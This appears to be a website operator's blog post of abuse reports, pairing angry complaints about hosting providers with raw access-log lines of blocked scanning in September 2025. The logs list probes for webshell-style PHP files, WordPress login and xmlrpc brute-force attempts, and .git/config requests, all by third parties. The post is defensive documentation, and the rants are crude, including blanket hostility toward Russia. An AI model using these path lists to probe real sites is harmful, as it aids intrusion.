AS141892 – CV Andhika Pratama Sanggoro – VERY UNWANTED AND IGNORANT PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
aamakhfudh@adisanggoro.sch.id – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.186.31.45 website*x.com – – [19/Sep/2025:15:53:33 +0200] „GET / HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
103.186.31.45 website*x.com – – [19/Sep/2025:15:53:33 +0200] „GET //woh.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“

MAIL NR. 2 – Hacker-Idiots from FRIDAY AFTERNOON!

mail@proton66.ru, abuse@att.net,abuse@rt.ru,abuse@charter.net

AS198953 – Proton66 OOO – AGAIN AND AGAIN! – VERY UNWANTED AND IGNORANT PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
mail@proton66.ru – IS TALKING BULLSHIT IN OUR ABUSE EMAILS! THIS IS VERY STUPID AND IGNORANT!
RUSSIA IS COMPLET UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
45.135.232.10 website*x.com – – [19/Sep/2025:16:55:12 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 403 – „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36“

AS7018 – AT&T Enterprises, LLC – VERY UNWANTED AND IGNORANT PROVIDER!!! – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@att.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
99.104.223.26 website*x.com – – [19/Sep/2025:16:55:17 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 403 – „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0“

AS12389 – PJSC Rostelecom – VERY UNWANTED AND IGNORANT PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@rt.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
RUSSIA IS COMPLETE UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
95.189.48.6 website*x.com – – [19/Sep/2025:16:55:22 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 403 – „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0“

AS20115 – Charter Communications LLC – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@charter.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
75.135.92.147 website*x.com – – [19/Sep/2025:16:55:49 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 302 20 „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0“

MAIL NR. 3 – Hacker-Idiots from FRIDAY AFTERNOON!

abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@datacamp.co.uk,

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
40.113.19.56 website*x.com – – [19/Sep/2025:18:29:13 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:29:13 +0200] „GET /error.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:29:28 +0200] „GET /hk.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:29:43 +0200] „GET /cjfuns.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:29:58 +0200] „GET /granary.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:30:13 +0200] „GET /aa21.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:30:29 +0200] „GET /akk.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:30:43 +0200] „GET /alpa.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:30:58 +0200] „GET /finny.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:31:13 +0200] „GET /aa18.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:31:28 +0200] „GET /bitch.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:31:43 +0200] „GET /file21.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:31:58 +0200] „GET /anan.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:32:14 +0200] „GET /as.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:32:28 +0200] „GET /acacia.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:32:43 +0200] „GET /rrr.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:32:59 +0200] „GET /folte.php HTTP/1.0“ 302 – „-“ „-“
40.113.19.56 website*x.com – – [19/Sep/2025:18:33:14 +0200] „GET /ssss.php HTTP/1.0“ 403 – „-“ „-“
… and so on… and so on… VERY UNSECURE PROVIDER!

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ONLY ONE AUTOMATIC ANSWER, NO MORE INFO! – ABUSE PER EMAIL IS STANDARD!!!
51.75.157.203 website*x.com – – [19/Sep/2025:21:02:01 +0200] „HEAD /wp-content/plugins/wordpress-corde/wordpresse-kore.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.75.157.203 website*x.com – – [19/Sep/2025:21:02:01 +0200] „HEAD /wp-content/plugins/wordpress-core/wordpress-core.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

MAIL NR. 4 – Hacker-Idiots from FRIDAY AFTERNOON!

abuse@datacamp.co.uk,google-cloud-compliance@google.com, network-abuse@google.com

AS212238 – Datacamp Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@datacamp.co.uk – ONLY ONE AUTOMATIC ANSWER, NO MORE INFO! – THIS IS VERY BAD!
138.199.10.11 website*x.com – – [19/Sep/2025:23:59:41 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/91.0.0.0 Safari/537.36“

AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
34.23.229.85 website*x.com – – [19/Sep/2025:23:47:26 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0“
34.23.229.85 website*x.com – – [19/Sep/2025:23:47:26 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0“
34.23.229.85 website*x.com – – [19/Sep/2025:23:47:26 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36“
34.23.229.85 website*x.com – – [19/Sep/2025:23:47:26 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/124.0.6367.56 Mobile/15E148 Safari/604.1“
34.23.229.85 website*x.com – – [19/Sep/2025:23:47:26 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.140 Safari/537.36 Vivaldi/6.4.3160.47“
34.23.229.85 website*x.com – – [19/Sep/2025:23:47:26 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 11; en-US; V2027) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.116 UCBrowser/13.4.0.1306 Mobile Safari/537.36“
34.23.229.85 website*x.com – – [19/Sep/2025:23:47:27 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 11; en-US; V2027) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.116 UCBrowser/13.4.0.1306 Mobile Safari/537.36“
34.23.229.85 website*x.com – – [19/Sep/2025:23:47:27 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Mobile/15E148 Safari/604.1“
34.23.229.85 website*x.com – – [19/Sep/2025:23:47:27 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36“
34.23.229.85 website*x.com – – [19/Sep/2025:23:47:27 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.56 Mobile Safari/537.36“

Schauen wir nun mal, welche Provider nun verantwortungsbewusst reagieren!

Letztes Wochende, 13. und 14. September 24!

Sehr amüsant auch hier mal wieder, es wird trotz einem 403 immer und immer wieder über die gleichen IP´S versucht:

MAIL NR. 1 SATURDAY

google-cloud-compliance@google.com, network-abuse@google.com,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse@datacamp.co.uk,abuse@cdn77.com

AS396982 – Google LLC – HERE WITH 2 IP´S! – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
104.196.254.105 website*x.com – – [13/Sep/2025:00:01:10 +0200] „HEAD /wp HTTP/1.0“ 403 – „http://www.website*x.com/wp“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.86 Safari/537.36 Brave/1.62.162“
104.196.254.105 website*x.com – – [13/Sep/2025:00:01:10 +0200] „HEAD /main HTTP/1.0“ 403 – „http://www.website*x.com/main“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36“
104.196.254.105 website*x.com – – [13/Sep/2025:00:01:10 +0200] „HEAD / HTTP/1.0“ 403 – „http://www.website*x.com/“ „Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1“
104.196.254.105 website*x.com – – [13/Sep/2025:00:01:10 +0200] „HEAD /old HTTP/1.0“ 403 – „http://www.website*x.com/old“ „Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.56 Mobile Safari/537.36“
104.196.254.105 website*x.com – – [13/Sep/2025:00:01:11 +0200] „HEAD /bk HTTP/1.0“ 403 – „http://www.website*x.com/bk“ „Mozilla/5.0 (Linux; Android 10; Nokia 2720 Flip) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36 KAIOS/2.5“
104.196.254.105 website*x.com – – [13/Sep/2025:00:01:11 +0200] „HEAD /bc HTTP/1.0“ 403 – „http://www.website*x.com/bc“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0“
104.196.254.105 website*x.com – – [13/Sep/2025:00:01:11 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „http://www.website*x.com/wordpress“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0“
104.196.254.105 website*x.com – – [13/Sep/2025:00:01:12 +0200] „HEAD /new HTTP/1.0“ 403 – „http://www.website*x.com/new“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.140 Safari/537.36 Vivaldi/6.4.3160.47“
+
34.74.187.253 website*x.com – – [13/Sep/2025:00:34:00 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36“
34.74.187.253 website*x.com – – [13/Sep/2025:00:34:01 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0“
34.74.187.253 website*x.com – – [13/Sep/2025:00:34:01 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15“
34.74.187.253 website*x.com – – [13/Sep/2025:00:34:01 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S918B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/24.0 Chrome/120.0.6099.144 Mobile Safari/537.36“
34.74.187.253 website*x.com – – [13/Sep/2025:00:34:01 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Mobile/15E148 Safari/604.1“
34.74.187.253 website*x.com – – [13/Sep/2025:00:34:01 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0“
34.74.187.253 website*x.com – – [13/Sep/2025:00:34:01 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.200 YaBrowser/24.1.0.0 Safari/537.36“
34.74.187.253 website*x.com – – [13/Sep/2025:00:34:01 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Mobile/15E148 Safari/604.1“
34.74.187.253 website*x.com – – [13/Sep/2025:00:34:01 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0“
34.74.187.253 website*x.com – – [13/Sep/2025:00:34:01 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 Edg/125.0.2535.51“

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
135.225.82.247 website*x.com – – [13/Sep/2025:00:58:59 +0200] „GET /akc.php HTTP/1.0“ 302 – „-“ „-“

AS212238 – Datacamp Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:49 +0200] „GET /manager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:49 +0200] „GET /bless.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:49 +0200] „GET /O-Simple.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:49 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:50 +0200] „GET /zwso.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:50 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:50 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:50 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:50 +0200] „GET /.well-known/login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:51 +0200] „GET /mah.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:51 +0200] „GET /fai.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:51 +0200] „GET /.wp/wso.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:51 +0200] „GET /core.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:51 +0200] „GET /robots.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
149.36.48.67 website*x.com – – [13/Sep/2025:03:51:52 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“

MAIL NR. 2 SATURDAY

abuse@virtualine.org,cybersecurity_abuse@globe.com.ph,abuse@globe.com.ph,shivacable7@gmail.com,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com

AS214940 – KPROHOST LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
198.55.98.93 website*x.de – – [13/Sep/2025:03:40:43 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Java/1.6.0_13“

AS132199 – Globe Telecom Inc. – AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
222.127.250.71 website*x.de – – [13/Sep/2025:08:13:03 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 10; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/11.0.0.0 Safari/537.36“

AS146890 – SHARVA TELENET PRIVATE LIMITED. – AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.173.21.84 website*x.de – – [13/Sep/2025:08:21:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; x86) AppleWebKit/537.36 (KHTML, like Gecko) Opera/74.0.0.0 Safari/537.36“

MAIL NR. 3 SATURDAY

abuse@cheapy.host,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,gestionip.ft@orange.com,abuse@orange.fr

AS3215 – Orange S.A. – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
90.70.97.160 website*x.com – – [13/Sep/2025:09:44:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/14.0.0.0 Safari/537.36“

MAIL NR. 4 SATURDAY

abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,ipadmin@cableonda.net,abuse@ovh.net,abuse@awasr.com

AS8075 – Microsoft Corporation – HERE WITH 2 IP´S! – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
52.178.193.251 website*x.de – – [13/Sep/2025:02:01:50 +0200] „GET /gg.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:02:05 +0200] „GET /aaaa.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:02:20 +0200] „GET /pp.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:02:35 +0200] „GET /blurbs8.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:02:50 +0200] „GET /wp-gr.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:03:05 +0200] „GET /dex.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:03:20 +0200] „GET /bin.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:03:36 +0200] „GET /filemanager.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:03:51 +0200] „GET /sad.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:04:06 +0200] „GET /bqcheck.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:04:21 +0200] „GET /atomlib.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:04:36 +0200] „GET /jga.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:04:51 +0200] „GET /sarang.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:05:06 +0200] „GET /bless3.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:05:21 +0200] „GET /makeasmtp.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:05:36 +0200] „GET /CLA.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:05:51 +0200] „GET /cf.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:06:06 +0200] „GET /yzkvrell.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:06:21 +0200] „GET /13.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:06:36 +0200] „GET /witmm.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:06:51 +0200] „GET /bv3.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:07:06 +0200] „GET /ahax.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:07:21 +0200] „GET /3.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:07:36 +0200] „GET /unity.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:07:51 +0200] „GET /new.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:08:06 +0200] „GET /kk.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:08:21 +0200] „GET /wander.php HTTP/1.0“ 302 – „-“ „-“
52.178.193.251 website*x.de – – [13/Sep/2025:02:08:36 +0200] „GET /gold.php HTTP/1.0“ 302 – „-“ „-“
+
52.178.159.75 www.website*x.de – – [13/Sep/2025:02:50:35 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“

AS18809 – Cable Onda – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
190.140.85.245 www.website*x.de – – [13/Sep/2025:02:20:29 +0200] „GET /wp-content/plugins/si-contact-form/captcha/securimage_show.php?prefix=hDEyM1Z6VlofDQfT HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43“

AS16276 – OVH SAS – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
145.239.10.137 website*x.de – – [13/Sep/2025:03:08:27 +0200] „GET /jos.php HTTP/1.0“ 302 – „http://website*x.de/jos.php“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1“

AS204170 – Awaser Oman LLC – AGAIN AND AGAIN!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
